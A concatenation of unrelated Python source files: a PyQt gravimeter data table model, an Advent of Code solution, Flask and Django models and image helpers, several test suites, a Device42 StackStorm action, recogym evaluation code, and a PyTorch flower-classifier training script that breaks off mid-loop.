        SCINTREX_TEMP: "Temp (K)",
        SCINTREX_DUR: "dur (s)",
        SCINTREX_REJ: "rej",
    }
    # Signals for notifying views/controllers of check-state changes.
    signal_update_coordinates = QtCore.pyqtSignal()
    signal_adjust_update_required = QtCore.pyqtSignal()
    signal_uncheck_station = QtCore.pyqtSignal()
    signal_check_station = QtCore.pyqtSignal()
    def __init__(self, ChannelList_obj, parent=None):
        QtCore.QAbstractTableModel.__init__(self, parent)
        self.unchecked = {}
        self.createArrayData(ChannelList_obj)
    def createArrayData(self, ChannelList_obj):
        """
        Create the np array data for table display, and update the
        ChannelList_obj.
        """
        self.ChannelList_obj = ChannelList_obj
        # Column-major concatenation reshaped to (n_rows, 9); order must
        # match the SCINTREX_* column constants.
        self.arraydata = np.concatenate(
            (
                ChannelList_obj.station,
                np.array(ChannelList_obj.t),
                np.array(ChannelList_obj.grav()),
                np.array(ChannelList_obj.sd),
                ChannelList_obj.tiltx,
                ChannelList_obj.tilty,
                ChannelList_obj.temp,
                ChannelList_obj.dur,
                ChannelList_obj.rej,
            )
        ).reshape(len(ChannelList_obj.t), 9, order="F")
    def rowCount(self, parent=None):
        """Number of table rows (one per time sample)."""
        return len(self.ChannelList_obj.t)
    def columnCount(self, parent):
        """Number of table columns (fixed by the header map)."""
        return len(self._headers)
    def flags(self, index):
        # All cells are selectable and checkable; none are editable.
        return Qt.ItemIsUserCheckable | Qt.ItemIsEnabled | Qt.ItemIsSelectable
    def data(self, index, role):
        """Qt data accessor: formatted display text and check state."""
        if not index.isValid():
            return None
        if role == Qt.DisplayRole:
            # view definition
            row = index.row()
            column = index.column()
            try:
                value = float(self.arraydata[row][column])
            except ValueError:
                # Non-numeric cells (e.g. station names) stay as-is.
                value = self.arraydata[row][column]
            def format_datetime(dt):
                return num2date(float(dt)).strftime("%Y-%m-%d %H:%M:%S")
            # Per-column formatter dispatch; default is plain str().
            fn, *args = {
                SCINTREX_DATE: (format_datetime, value),
                SCINTREX_REJ: (format, value, "2.0f"),
                SCINTREX_DUR: (format, value, "3.0f"),
                SCINTREX_G: (format, value, "8.1f"),
                SCINTREX_SD: (format, value, "8.1f"),
            }.get(column, (str, value))
            return fn(*args)
        if role == Qt.CheckStateRole:
            # check status definition
            if index.column() == 0:
                return self.checkState(index)
    def checkAll(self):
        """Mark every sample as kept and notify listeners."""
        self.ChannelList_obj.keepdata = [1] * len(self.ChannelList_obj.raw_grav)
        self.signal_adjust_update_required.emit()
        self.layoutChanged.emit()
        self.signal_check_station.emit()
        self.dataChanged.emit(QModelIndex(), QModelIndex())
    def uncheckAll(self):
        """Mark every sample as discarded and notify listeners."""
        self.ChannelList_obj.keepdata = [0] * len(self.ChannelList_obj.raw_grav)
        self.signal_adjust_update_required.emit()
        self.layoutChanged.emit()
        self.signal_uncheck_station.emit()
        self.dataChanged.emit(QModelIndex(), QModelIndex())
    def checkState(self, index):
        """
        By default, everything is checked. If keepdata property from the
        ChannelList object is 0, it is unchecked
        """
        if self.ChannelList_obj.keepdata[index.row()] == 0:
            self.unchecked[index] = Qt.Unchecked
            return self.unchecked[index]
        else:
            return Qt.Checked
    def setData(self, index, value, role, silent=False):
        # type: (object, object, object) -> object
        """
        if a row is unchecked, update the keepdata value to 0 setData launched
        when role is acting value is Qt.Checked or Qt.Unchecked
        """
        # NOTE(review): returns None (not False) for unhandled roles; Qt
        # expects a bool here — confirm callers tolerate this.
        if role == Qt.CheckStateRole and index.column() == 0:
            if value == Qt.Checked:
                self.ChannelList_obj.keepdata[index.row()] = 1
                self.signal_check_station.emit()
            elif value == Qt.Unchecked:
                self.unchecked[index] = value
                self.ChannelList_obj.keepdata[index.row()] = 0
                # If nothing is left checked, the whole station is unchecked.
                if not any(self.ChannelList_obj.keepdata):
                    self.signal_uncheck_station.emit()
            if not silent:
                self.signal_adjust_update_required.emit()
                self.dataChanged.emit(index, index)
            return True
    def headerData(self, section, orientation, role):
        """Horizontal headers come from _headers; others fall back to 1-based index."""
        if role == Qt.DisplayRole and orientation == Qt.Horizontal:
            return self._headers.get(section, section + 1)
|
# Example public keys from the puzzle text: [5764801, 17807724]
# Actual puzzle input: the card's and door's public keys.
# NOTE: the name shadows the builtin ``input``; harmless in this script.
input = [14222596, 4057428]
def transform(n, subject_number):
    """Apply one step of the AoC 2020 day 25 handshake transform.

    Multiplies the current value by the subject number and reduces it
    modulo 20201227.  (The original used ``divmod`` and discarded the
    quotient; ``%`` expresses the same thing directly.)
    """
    return n * subject_number % 20201227
def loop_size(subject_number, key):
    """Brute-force the secret loop size: the number of transform steps
    needed to turn 1 into ``key`` with the given subject number."""
    value, steps = 1, 0
    while value != key:
        value = transform(value, subject_number)
        steps += 1
    return steps
def calculate_key(subject_number, loop_size):
    """Return the encryption key: subject_number transformed loop_size times.

    The repeated transform is exactly modular exponentiation, so use the
    built-in three-argument ``pow`` — O(log loop_size) instead of the
    original O(loop_size) multiply loop, with identical results.
    """
    return pow(subject_number, loop_size, 20201227)
# star one
# The card's loop size is recovered from its public key (input[1]); the door's
# public key (input[0]) transformed that many times is the encryption key.
print(calculate_key(input[0], loop_size(7, input[1])))
|
from app import db
import json
import base64
from werkzeug.security import generate_password_hash, check_password_hash
from flask_login import UserMixin
#from enum import Enum
#class StatusEnum(Enum):
# off = "off"
# on = "on"
class User(UserMixin, db.Model):
    """Login account; only a salted password hash is ever stored."""
    id = db.Column(db.Integer, primary_key = True)
    email = db.Column(db.String(120), index = True, unique = True)
    password_hash = db.Column(db.String(128))
    @property
    def password(self):
        """Write-only attribute: reading the plaintext is deliberately blocked."""
        raise AttributeError('password is not a readable attribute')
    @password.setter
    def password(self, password):
        # Hash on assignment so the plaintext is never persisted.
        self.password_hash = generate_password_hash(password)
    def verify_password(self, password):
        """Return True if ``password`` matches the stored hash."""
        return check_password_hash(self.password_hash, password)
class Token(db.Model):
    """API access token that can be toggled on/off via ``enabled``."""
    id = db.Column(db.Integer, primary_key = True)
    token = db.Column(db.String(64))
    enabled = db.Column(db.Boolean, default=True)
    def __repr__(self):
        return self.token
class Repository(db.Model):
    """A watched repository with create/add/push timestamps and fetched text."""
    id = db.Column(db.Integer, primary_key = True)
    key = db.Column(db.String(90))
    watcher_id = db.Column(db.Integer, db.ForeignKey('watcher.id'))
    watcher = db.relationship("Watcher", back_populates="repositories")
    # Lifecycle timestamps recorded by the watcher.
    create = db.Column(db.DateTime)
    add = db.Column(db.DateTime)
    push = db.Column(db.DateTime)
    # NOTE(review): Text(convert_unicode=...) was removed in SQLAlchemy 1.4 —
    # confirm the pinned SQLAlchemy version still accepts it.
    text_raw = db.Column(db.Text(convert_unicode = True))
    text = db.Column(db.Text(convert_unicode = True))
    def __repr__(self):
        return self.text
class Watcher(db.Model):
    """Links a Service and an Application and owns the repositories it tracks."""
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String(100))
    # Feature flags: whether to track repositories and pushes.
    repository = db.Column(db.Boolean, default=False)
    push = db.Column(db.Boolean, default=False)
    push_params = db.Column(db.JSON)
    params = db.Column(db.JSON)
    service_id = db.Column(db.Integer, db.ForeignKey('service.id'))
    service = db.relationship("Service", back_populates="watchers")
    application_id = db.Column(db.Integer, db.ForeignKey('application.id'))
    application = db.relationship("Application", back_populates="watchers")
    repositories = db.relationship("Repository", order_by=Repository.id, back_populates="watcher")
    def __repr__(self):
        return self.name
class Service(db.Model):
    """An external API endpoint; deleting it cascades to its watchers."""
    id = db.Column(db.Integer, primary_key = True)
    api = db.Column(db.String(100), nullable=False)
    status = db.Column(db.DateTime)  # last status-check timestamp
    params = db.Column(db.JSON)
    watchers = db.relationship("Watcher", order_by=Watcher.id, back_populates="service", cascade="all, delete, delete-orphan")
    def __repr__(self):
        return self.api
class Application(db.Model):
    """A monitored application; watchers reference it without cascade delete."""
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String(100), nullable=False)
    status = db.Column(db.DateTime)  # last status-check timestamp
    params = db.Column(db.JSON)
    watchers = db.relationship("Watcher", order_by=Watcher.id, back_populates="application")
    def __repr__(self):
        return self.name
|
import warnings
from weylchamber import closest_LI, c1c2c3
import qutip
def test_closest_LI_trivial_powell():
    """A gate exactly at its own (c1, c2, c3) must be its own closest LI gate."""
    warnings.filterwarnings(
        'ignore', message='the matrix subclass is not the recommended way')
    gate = qutip.gates.cnot()
    weyl_coords = c1c2c3(gate)
    closest = closest_LI(gate, *weyl_coords, method='Powell')
    assert isinstance(closest, qutip.Qobj)
    assert (gate - closest).norm() < 1e-15
def test_closest_LI_trivial_leastsq():
    """A gate exactly at its own (c1, c2, c3) must be its own closest LI gate."""
    warnings.filterwarnings(
        'ignore', message='the matrix subclass is not the recommended way')
    gate = qutip.gates.cnot()
    weyl_coords = c1c2c3(gate)
    closest = closest_LI(gate, *weyl_coords, method='leastsq')
    assert isinstance(closest, qutip.Qobj)
    assert (gate - closest).norm() < 1e-15
|
import requests
from st2common.runners.base_action import Action
from urlparse import urlparse
class Device42BaseException(Exception):
    """Base exception for Device42 action errors."""
    pass
class BaseAction(Action):
    """Base class for Device42 actions.

    Validates the connection configuration and provides thin GET/PUT/POST
    wrappers around the Device42 REST API.  All helpers return parsed JSON
    on a 2xx response and the raw ``requests`` response otherwise.
    """
    def __init__(self, config):
        super(BaseAction, self).__init__(config)
        # d42_server should be approximately -> https://00.00.00.00/api/1.0/
        self.d42_server = self.config.get('d42_server', None)
        if not self.d42_server:
            raise ValueError('"d42_server" config value is required')
        self.d42_username = self.config.get('d42_username', None)
        if not self.d42_username:
            raise ValueError('"d42_username" config value is required')
        self.d42_password = self.config.get('d42_password', None)
        if not self.d42_password:
            raise ValueError('"d42_password" config value is required')
        self.verify = self.config.get('verify_certificate', False)
        self.headers = {
            'Accept': 'application/json',
            'Content-Type': 'application/json'
        }
    def getAPI(self, endpoint, params, headers=None):
        """GET ``endpoint`` with the configured credentials."""
        if headers is None:
            headers = self.headers
        r = requests.get(
            "%s%s" % (self.d42_server, endpoint),
            params=params,
            auth=(self.d42_username, self.d42_password),
            verify=self.verify,
            headers=headers
        )
        if r.ok:
            return r.json()
        else:
            return r
    def putAPI(self, endpoint, params=None, payload=None):
        """PUT ``payload`` to ``endpoint`` with the configured credentials."""
        r = requests.put(
            "%s%s" % (self.d42_server, endpoint),
            params=params,
            data=payload,
            auth=(self.d42_username, self.d42_password),
            verify=self.verify
        )
        if r.ok:
            return r.json()
        else:
            return r
    def postAPI(self, endpoint, params=None, payload=None):
        """POST ``payload`` to ``endpoint`` with the configured credentials."""
        r = requests.post(
            "%s%s" % (self.d42_server, endpoint),
            params=params,
            data=payload,
            auth=(self.d42_username, self.d42_password),
            verify=self.verify
        )
        if r.ok:
            return r.json()
        else:
            return r
    def post(
        self,
        endpoint,
        headers=None,
        params=None,
        payload=None,
        doql_query=None
    ):
        """POST with optional DOQL routing.

        When ``doql_query`` is True the request is sent to the server root
        (the DOQL URI) instead of the regular API base, and the raw response
        is returned rather than parsed JSON.
        """
        # allow for the doql_query input parameter to call D42 via the
        # doql API URI not the regular API
        if doql_query is True:
            d42_url_split = urlparse(self.d42_server)
            d42_server = "%s://%s/" % (
                d42_url_split.scheme, d42_url_split.netloc
            )
        else:
            d42_server = self.d42_server
        url = "%s%s" % (d42_server, endpoint)
        r = requests.post(
            url=url,
            # Use the configured credentials; a previous revision sent
            # hard-coded debug credentials here.
            auth=(self.d42_username, self.d42_password),
            headers=headers,
            params=params,
            data=payload,
            verify=self.verify,
        )
        if r.ok:
            if doql_query is True:
                return r
            else:
                return r.json()
        else:
            return r
|
import unittest
from requests import Session
from adapter import p
from spoofbot.adapter.har import HarCache
class HarProxyTest(unittest.TestCase):
    """Tests for HarCache replaying recorded wuxiaworld.com traffic offline."""
    session: Session = None  # shared session mounted with the HAR adapter
    adapter: HarCache = None  # offline HAR-backed transport adapter
    @classmethod
    def setUpClass(cls) -> None:
        # Loose matching by default; individual tests tighten it as needed.
        cls.adapter = HarCache(
            p / 'test_data/www.wuxiaworld.com_Archive_ALL.har',
            match_headers=False,
            match_header_order=False,
            match_data=False,
        )
        cls.adapter.is_offline = True
        cls.session = Session()
        cls.session.mount('http://', cls.adapter)
        cls.session.mount('https://', cls.adapter)
    def test_hit(self):
        """With delete_after_hit off, the same entry can be served twice."""
        self.adapter.delete_after_hit = False
        self.assertIsNotNone(self.session.get("https://www.wuxiaworld.com/novels"))
        self.assertIsNotNone(self.session.get("https://www.wuxiaworld.com/novels"))
    def test_delete(self):
        """With delete_after_hit on, an entry is consumed and a third request fails."""
        self.assertIsNotNone(
            self.session.get("https://www.wuxiaworld.com/profile/karma"))
        self.adapter.delete_after_hit = True
        self.assertIsNotNone(
            self.session.get("https://www.wuxiaworld.com/profile/karma"))
        with self.assertRaises(Exception):
            self.session.get("https://www.wuxiaworld.com/profile/karma")
    def test_strict(self):
        """Strict header/data matching serves only an exact header match."""
        self.adapter.match_headers = True
        self.adapter.match_header_order = False
        self.adapter.match_data = True
        self.adapter.delete_after_hit = True
        # Exact recorded header set: must hit.
        self.assertIsNotNone(self.session.get("https://www.wuxiaworld.com/", headers={
            'Host': 'www.wuxiaworld.com',
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language': 'en-US,en;q=0.5',
            'Accept-Encoding': 'gzip, deflate, br',
            'Connection': 'keep-alive',
            'Upgrade-Insecure-Requests': '1',
            'TE': 'Trailers'
        }))
        # Same request minus the TE header: strict matching must reject it.
        with self.assertRaises(Exception):
            self.assertIsNotNone(
                self.session.get("https://www.wuxiaworld.com/", headers={
                    'Host': 'www.wuxiaworld.com',
                    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0',
                    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                    'Accept-Language': 'en-US,en;q=0.5',
                    'Accept-Encoding': 'gzip, deflate, br',
                    'Connection': 'keep-alive',
                    'Upgrade-Insecure-Requests': '1'
                }))
|
import gym
import pandas as pd
import datetime
from recogym.agents import OrganicUserEventCounterAgent, organic_user_count_args
from recogym import build_agent_init
from recogym.agents import Agent
from recogym import Configuration
from recogym import (
gather_agent_stats,
AgentStats
)
from recogym import env_1_args
def produce_agent_stats(
        env,
        std_env_args,
        agent: Agent,
        num_products: int,
        num_organic_users_to_train: int,
        num_users_to_train: int,
        num_users_to_score: int,
        random_seed: int,
        agent_class,
        agent_configs,
        agent_name: str,
        with_cache: bool,
):
    """Run gather_agent_stats and condense the results into one DataFrame row.

    Trains/scores ``agent`` (plus a freshly built ``agent_class`` agent)
    in ``env`` and returns a DataFrame with the 2.5%/50%/97.5% quantiles of
    the scored metric and the wall-clock time in seconds.
    """
    stat_epochs = 1
    stat_epochs_new_random_seed = True
    training_data_samples = tuple([num_users_to_train])
    testing_data_samples = num_users_to_score
    time_start = datetime.datetime.now()
    agent_stats = gather_agent_stats(
        env,
        std_env_args,
        {
            'agent': agent,
        },
        {
            **build_agent_init(
                agent_name,
                agent_class,
                {
                    **agent_configs,
                    'num_products': num_products,
                }
            ),
        },
        training_data_samples,
        testing_data_samples,
        stat_epochs,
        stat_epochs_new_random_seed,
        num_organic_users_to_train,
        with_cache
    )
    # Collect the three quantiles for every evaluated agent.
    q0_025 = []
    q0_500 = []
    q0_975 = []
    for agent_name in agent_stats[AgentStats.AGENTS]:
        agent_values = agent_stats[AgentStats.AGENTS][agent_name]
        q0_025.append(agent_values[AgentStats.Q0_025][0])
        q0_500.append(agent_values[AgentStats.Q0_500][0])
        q0_975.append(agent_values[AgentStats.Q0_975][0])
    time_end = datetime.datetime.now()
    seconds = (time_end - time_start).total_seconds()
    # NOTE(review): 'time' is a single-element list while the quantile
    # columns may have one entry per agent — confirm only one agent is ever
    # evaluated here.
    return pd.DataFrame(
        {
            'q0.025': q0_025,
            'q0.500': q0_500,
            'q0.975': q0_975,
            'time': [seconds],
        }
    )
def create_agent_and_env_sess_pop(
        num_products: int,
        num_organic_users_to_train: int,
        num_users_to_train: int,
        num_users_to_score: int,
        random_seed: int,
        latent_factor: int,
        num_flips: int,
        log_epsilon: float,
        sigma_omega: float,
        agent_class,
        agent_configs,
        agent_name: str,
        with_cache: bool,
        reverse_pop=False
):
    """Build the recogym environment and the session-popularity baseline agent.

    Returns ``(env, std_env_args, sess_pop_agent)``.  Several parameters
    (e.g. ``num_users_to_train``, ``agent_class``) are unused here but kept
    so the signature mirrors eval_against_session_pop.
    """
    std_env_args = {
        **env_1_args,
        'random_seed': random_seed,
        'num_products': num_products,
        'K': latent_factor,
        'sigma_omega': sigma_omega,
        'number_of_flips': num_flips
    }
    env = gym.make('reco-gym-v1')
    # Epsilon-greedy organic popularity counter serves as the baseline.
    sess_pop_agent = OrganicUserEventCounterAgent(Configuration({
        **organic_user_count_args,
        **std_env_args,
        'select_randomly': True,
        'epsilon': log_epsilon,
        'num_products': num_products,
        'reverse_pop': reverse_pop
    }))
    return env, std_env_args, sess_pop_agent
def eval_against_session_pop(
        num_products: int,
        num_organic_users_to_train: int,
        num_users_to_train: int,
        num_users_to_score: int,
        random_seed: int,
        latent_factor: int,
        num_flips: int,
        log_epsilon: float,
        sigma_omega: float,
        agent_class,
        agent_configs,
        agent_name: str,
        with_cache: bool,
):
    """Evaluate the session-popularity baseline and return its stats DataFrame.

    Thin composition of create_agent_and_env_sess_pop and produce_agent_stats.
    """
    env, std_env_args, agent = create_agent_and_env_sess_pop(
        num_products,
        num_organic_users_to_train,
        num_users_to_train,
        num_users_to_score,
        random_seed,
        latent_factor,
        num_flips,
        log_epsilon,
        sigma_omega,
        agent_class,
        agent_configs,
        agent_name,
        with_cache,
    )
    return produce_agent_stats(
        env,
        std_env_args,
        agent,
        num_products,
        num_organic_users_to_train,
        num_users_to_train,
        num_users_to_score,
        random_seed,
        agent_class,
        agent_configs,
        agent_name,
        with_cache,
    )
def first_element(sc, name):
    """Tag *sc* with a model name and collapse its one-element quantile columns.

    Mutates *sc* in place (each q-column is replaced by its first element),
    prints the result for quick inspection, and returns the same mapping.
    """
    sc['model'] = name
    for quantile_key in ('q0.025', 'q0.500', 'q0.975'):
        sc[quantile_key] = sc[quantile_key][0]
    print(sc)
    return sc
|
# @Author : FederalLab
# @Date : 2021-09-25 16:52:03
# @Last Modified by : Chen Dengsheng
# @Last Modified time: 2021-09-25 16:52:03
# Copyright (c) FederalLab. All rights reserved.
from typing import List
import numpy as np
from openfed.utils import tablist
def samples_distribution(federated_dataset, verbose: bool = True) -> List:
    r"""Collect the number of samples held by each part of *federated_dataset*.

    Args:
        federated_dataset: Dataset exposing ``total_parts``, ``set_part_id``
            and ``__len__``.
        verbose: If ``True``, print a one-row summary table (count, total,
            mean and variance of the per-part sample sizes).

    Returns:
        List with the sample count of every part, in part-id order.
    """
    parts_list = []
    for part_id in range(federated_dataset.total_parts):
        federated_dataset.set_part_id(part_id)
        parts_list.append(len(federated_dataset))
    if verbose:
        summary = dict(
            Parts=federated_dataset.total_parts,
            Samples=sum(parts_list),
            Mean=np.mean(parts_list),
            Var=np.var(parts_list),
        )
        print(
            tablist(
                head=list(summary.keys()),
                data=list(summary.values()),
                force_in_one_row=True,
            ))
    return parts_list
|
from dataclasses import dataclass
from pathlib import Path
import os
import tempfile
from django.apps import apps
from django.conf import settings
from django.core.files.images import ImageFile
from django.utils.translation import gettext_lazy as _
import PIL as pillow
###############################################################################
# Image model and related stuff
###############################################################################
def img_upload_to(instance, filename):
    """
    Calculate the upload destination for an image file.

    The file is placed under the app's configured image media directory,
    after normalising the name through the field's storage backend and
    truncating so the full relative path stays under Django's historical
    100-character FileField limit.
    """
    config = apps.get_app_config("webquills")
    folder_name = config.get_image_media_dir()
    # Drop any directory components the client supplied.
    filename = Path(filename).name
    filename = instance.file.field.storage.get_valid_name(filename)
    # Truncate filename so it fits in the 100 character limit
    # https://code.djangoproject.com/ticket/9893
    full_path = os.path.join(folder_name, filename)
    if len(full_path) >= 95:
        # Trim the stem only, keeping the extension intact.
        chars_to_trim = len(full_path) - 94
        prefix, extension = os.path.splitext(filename)
        filename = prefix[:-chars_to_trim] + extension
        full_path = os.path.join(folder_name, filename)
    return full_path
# instance may be passed as positional, other kwargs are keyword-only
def resize_image(instance: "Image", *, width: int = None, height: int = None):
    """Generate a resized version of Image maintaining the same aspect ratio.

    With neither dimension given, the app's default size is used; with one
    given, the other is derived from the source aspect ratio. Returns the
    storage name of the resized file, or of the original if it already fits
    inside the requested box (no upscaling).
    """
    app = apps.get_app_config("webquills")
    op_name = "resize"
    imagedir = app.get_image_media_dir()
    # We know the op_name, now work out the arguments
    # Called without a size, use our default size.
    if width is None and height is None:
        width, height = app.get_default_image_size()
    # Called with only one, calculate the other based on aspect ratio
    if width is None or height is None:
        aspect_ratio = instance.width / instance.height
        if height:
            width = int(height * aspect_ratio)
        else:
            height = int(width / aspect_ratio)
    # If the image already fits in the box, just return it, don't upscale
    if instance.width < width and instance.height < height:
        return instance.file.name
    storage = instance.file.storage
    # Encode the operation and box size into the destination directory name.
    newname = instance.file.name.replace(imagedir, f"img-{op_name}-{width}x{height}")
    newname = storage.generate_filename(newname)
    with instance.open_file() as img_file:
        image = pillow.Image.open(img_file).copy()  # open original image
        image.thumbnail([width, height])  # transform in memory
    # Store to local file. Suffix needed for img format detection
    tmpfile = tempfile.NamedTemporaryFile(
        "wb", delete=False, suffix=Path(newname).suffix
    )
    # NOTE(review): Image.copy() leaves .format unset; saving presumably
    # relies on the tmpfile suffix for format detection — confirm.
    image.save(tmpfile, format=image.format)
    # To reopen, some platforms require close
    # https://docs.python.org/3.8/library/tempfile.html#tempfile.NamedTemporaryFile
    tmpfile.close()
    # Hand the tmpfile to the image storage. Must have valid img suffix e.g. .jpg
    saved_as = storage.save(newname, ImageFile(open(tmpfile.name, "rb")))
    return saved_as
def fillcrop_image(instance: "Image", *, width: int, height: int):
    """Generate a resized version of Image cropped to the specified aspect ratio.

    The source is scaled to cover the width x height box and the excess in
    the longer dimension is cropped symmetrically about the centre. Returns
    the storage name of the result, or of the original if it already fits
    inside the box (no upscaling).
    """
    app = apps.get_app_config("webquills")
    op_name = "fillcrop"
    imagedir = app.get_image_media_dir()
    # If the image already fits in the box, just return it, don't upscale
    if instance.width < width and instance.height < height:
        return instance.file.name
    storage = instance.file.storage
    # Encode the operation and box size into the destination directory name.
    newname = instance.file.name.replace(imagedir, f"img-{op_name}-{width}x{height}")
    newname = storage.generate_filename(newname)
    with instance.open_file() as img_file:
        image = pillow.Image.open(img_file).copy()  # open original image
        target_aspect = width / height
        if instance.aspect_ratio > target_aspect:
            # src is wider, so fit the height and crop the width
            temp_width = int(height * instance.aspect_ratio)
            image.thumbnail([temp_width, height])  # transform in memory
            x = int((temp_width - width) / 2)  # crop from center
            image = image.crop([x, 0, x + width, height])
        else:
            # dest is wider, fit the width and crop the height
            temp_height = int(width / instance.aspect_ratio)
            image.thumbnail([width, temp_height])  # transform in memory
            y = int((temp_height - height) / 2)  # crop from center
            image = image.crop([0, y, width, y + height])
    # Store to local file. Suffix needed for img format detection
    tmpfile = tempfile.NamedTemporaryFile(
        "wb", delete=False, suffix=Path(newname).suffix
    )
    # NOTE(review): Image.copy() leaves .format unset; saving presumably
    # relies on the tmpfile suffix for format detection — confirm.
    image.save(tmpfile, format=image.format)
    # To reopen, some platforms require close
    # https://docs.python.org/3.8/library/tempfile.html#tempfile.NamedTemporaryFile
    tmpfile.close()
    # Hand the tmpfile to the image storage. Must have valid img suffix e.g. .jpg
    saved_as = storage.save(newname, ImageFile(open(tmpfile.name, "rb")))
    return saved_as
@dataclass
class Thumb:
    "A helper class representing a transformed image."
    # Name of the transform operation, e.g. "resize" or "fillcrop".
    op: str
    # Keyword arguments the operation was (or will be) called with.
    kwargs: dict
    # Media-relative storage path of the generated file; empty until produced.
    path: str = ""
    @property
    def url(self) -> str:
        # Public URL of the transformed image under MEDIA_URL.
        return settings.MEDIA_URL + self.path
|
import numpy as np
import matplotlib as plt
import torch
import torchvision
from torchvision import datasets, models, transforms
from torch.utils.data import DataLoader
import torch.nn.functional as Function
from torch import nn, optim
from torch.autograd import Variable
from PIL import Image
import json
from workspace_utils import active_session
from workspace_utils import keep_awake
import argparse
# Command-line interface for the training script.
argument_parse = argparse.ArgumentParser()
# BUG FIX: default was the truthy string 'gpu', so the GPU branch was taken
# even without --gpu; a store_true flag must default to False.
argument_parse.add_argument('--gpu', action = 'store_true', default = False, help = 'needed for training the network')
argument_parse.add_argument('--epochs', action='store', type=int, default = 5, help='sets epochs to train the model over and over again')
argument_parse.add_argument('--arch', '--a', default='vgg13', help='architecture of choice')
argument_parse.add_argument('--learning_rate', action='store', type= float, default = 0.01, help=' learning rate of the model is set')
# BUG FIX: help text previously (wrongly) described the learning rate.
argument_parse.add_argument('--hidden_layer', action='store', type= int, default = 2048, help='number of units in the hidden layer')
argument_parse.add_argument('--data_dir', '--d', type=str ,default = 'flowers', help='path to the folder that contains flower images')
argument_parse.add_argument('--save_dir', '--s', help='to set the directory to save checkpoints')
args= argument_parse.parse_args()
# Dataset layout: <data_dir>/{train,valid,test}
data_dir = args.data_dir
train_dir = data_dir + '/train'
valid_dir = data_dir + '/valid'
test_dir = data_dir + '/test'
lr = args.learning_rate
arch = args.arch
hidden_layer = args.hidden_layer
model = arch  # placeholder; replaced by the torchvision model below
# Training-set augmentation (random crop/flip) plus ImageNet normalisation.
data_transforms_one = transforms.Compose([
    transforms.RandomResizedCrop(224),
    transforms.RandomHorizontalFlip(),
    transforms.ToTensor(),
    transforms.Normalize([0.485, 0.456, 0.406],
                         [0.229, 0.224, 0.225])])
# NOTE(review): data_transforms_two and data_transforms_three are defined but
# never used — all three datasets below are built with data_transforms_one.
# Validation/test pipelines normally use Resize+CenterCrop only; confirm intent.
data_transforms_two = transforms.Compose([
    transforms.RandomHorizontalFlip(),
    transforms.RandomVerticalFlip(),
    transforms.Resize(255),
    transforms.CenterCrop(224),
    transforms.ToTensor(),
    transforms.Normalize([0.485, 0.456, 0.406],[0.229, 0.224, 0.225])])
data_transforms_three = transforms.Compose([
    transforms.RandomHorizontalFlip(),
    transforms.RandomVerticalFlip(),
    transforms.Resize(255),
    transforms.CenterCrop(224),
    transforms.ToTensor(),
    transforms.Normalize([0.485, 0.456, 0.406],[0.229, 0.224, 0.225])])
train_dataset = datasets.ImageFolder(train_dir, transform=data_transforms_one)
valid_dataset = datasets.ImageFolder(valid_dir, transform=data_transforms_one)
test_dataset = datasets.ImageFolder(test_dir, transform=data_transforms_one)
# Only the training loader is shuffled.
train_loaders = torch.utils.data.DataLoader(train_dataset, shuffle = True, batch_size = 64)
valid_loaders = torch.utils.data.DataLoader(valid_dataset, batch_size = 64)
test_loaders = torch.utils.data.DataLoader(test_dataset, batch_size = 30)
import json
# Mapping from category id to human-readable flower name.
with open('cat_to_name.json', 'r') as f:
    cat_to_name = json.load(f)
from torch import nn, optim
class Feedforward(torch.nn.Module):
    """Single-hidden-layer classifier head emitting log-probabilities over 102 classes.

    Args:
        input_size: size of the flattened feature vector fed to the head.
        hidden_size: number of units in the hidden layer.
        drop_p: dropout probability applied after the hidden activation.
    """
    def __init__(self, input_size, hidden_size, drop_p=0.2):
        super(Feedforward, self).__init__()
        self.input_size = input_size
        self.hidden_size = hidden_size
        self.fc1 = torch.nn.Linear(self.input_size, self.hidden_size)
        self.relu = torch.nn.ReLU()
        self.fc2 = torch.nn.Linear(self.hidden_size, 102)
        self.dropout = nn.Dropout(p=drop_p)
        self.activation = torch.nn.LogSoftmax(dim=1)
    def forward(self, x):
        """Return log-softmax class scores for a batch of feature vectors."""
        hidden = self.fc1(x)
        relu = self.relu(hidden)
        # BUG FIX: self.dropout was constructed but never applied, so the
        # drop_p argument had no effect; apply it after the activation.
        dropped = self.dropout(relu)
        output_one = self.fc2(dropped)
        output_final = self.activation(output_one)
        return output_final
# Select a pretrained backbone; only vgg13/vgg16 are supported here.
if args.arch == 'vgg13':
    model = models.vgg13(pretrained=True)
elif args.arch == 'vgg16':
    model = models.vgg16(pretrained = True)
# NOTE(review): any other --arch value leaves `model` as the arch string —
# the code below would then fail; consider validating via argparse choices.
device = torch.device("cuda:0" if torch.cuda.is_available() and args.gpu else "cpu")
# Freeze the convolutional features; only the new classifier head is trained.
for param in model.parameters():
    param.requires_grad = False
model.classifier = Feedforward(25088, hidden_layer)  # 25088 = VGG flattened feature size
model = model.to(device)
criterion = nn.NLLLoss()  # pairs with the LogSoftmax output of Feedforward
optimizer = optim.SGD(model.classifier.parameters(),lr)
print(model)
# Training loop: optimise the classifier head, running a validation pass
# every `print_step` batches.
steps_taken = 0
running_loss = 0.0
print_step = 10
epochs = args.epochs
with active_session():
    for epoch in range(epochs):
        for inputs, labels in train_loaders:
            steps_taken += 1
            inputs = inputs.to(device)
            labels = labels.to(device)
            optimizer.zero_grad()
            log = model.forward(inputs)
            loss = criterion(log, labels)
            loss.backward()
            optimizer.step()
            running_loss += loss.item()
            if steps_taken % print_step == 0:
                loss_v = 0
                accuracy = 0
                model.eval()
                with torch.no_grad():
                    for inputs, labels in valid_loaders:
                        inputs, labels = inputs.to(device), labels.to(device)
                        log = model.forward(inputs)
                        batch_loss = criterion(log, labels)
                        loss_v += batch_loss.item()
                        #https://towardsdatascience.com/how-to-train-an-image-classifier-in-pytorch-and-
                        #use-it-to-perform-basic-inference-on-single-images-99465a1e9bf5
                        # accuracy: fraction of batches' top-1 predictions matching labels
                        ps = torch.exp(log)
                        top_p, top_class = ps.topk(1, dim=1)
                        equals = top_class == labels.view(*top_class.shape)
